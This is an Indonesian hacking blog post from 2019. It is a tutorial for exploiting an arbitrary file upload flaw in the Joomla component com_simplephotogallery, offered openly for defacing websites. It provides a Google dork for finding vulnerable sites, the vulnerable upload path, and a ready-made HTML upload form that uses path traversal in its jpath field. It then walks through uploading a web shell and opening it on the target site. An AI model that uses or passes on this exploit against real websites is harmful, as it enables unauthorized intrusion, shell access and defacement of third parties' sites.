Breaking

Rabu, 25 September 2019

Joomla com_simplephotogallery arbitrary file upload

Met malem kawan qu semua, balik lagi dengan aku admin yg paling gantenkk bersama dengan istriku Kaguya >///<. Hari ini gw dan ditemani mbebs ku seperti biasa share tutorial dipes lagi karena ora depes ora debes yaitu dengan exploit Joomla component com_simplephotogallery arbitrary file upload. Ini exploit lama sih tapi share ajalah mungkin aj ad yg blom tau hehe w kan baek.

Dork:
inurl:index.php?option=com_simplephotogallery
Exploit: /administrator/components/com_simplephotogallery/lib/uploadFile.php
CSRF:

<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
  <input type="file" name="uploadfile"> <br>
  <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" > <br>
  <input type="submit" name="Submit" value="Gaskeun!">
</form>

Ngedorking dlo yakan :vroooot
Lalu masukan exploit na ke url target :vreeeet
(http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php) klu not found atau forbidden tinggalkan saja dia
Ke CSRF na tros edit (localhost) jadi web targetmu
Buka CSRF na dibrowser lalu langsung aj upload shell mu h3h3 kalau berhasil akan ada nama file yg diupload tinggal salin aj
Tengok dikiri atas, tu nama file kau
Tinggal salin aja nama filenya lalu akses shellnya
(http://localhost/shell_[random].php
Done muehehe


Tidak ada komentar:

Posting Komentar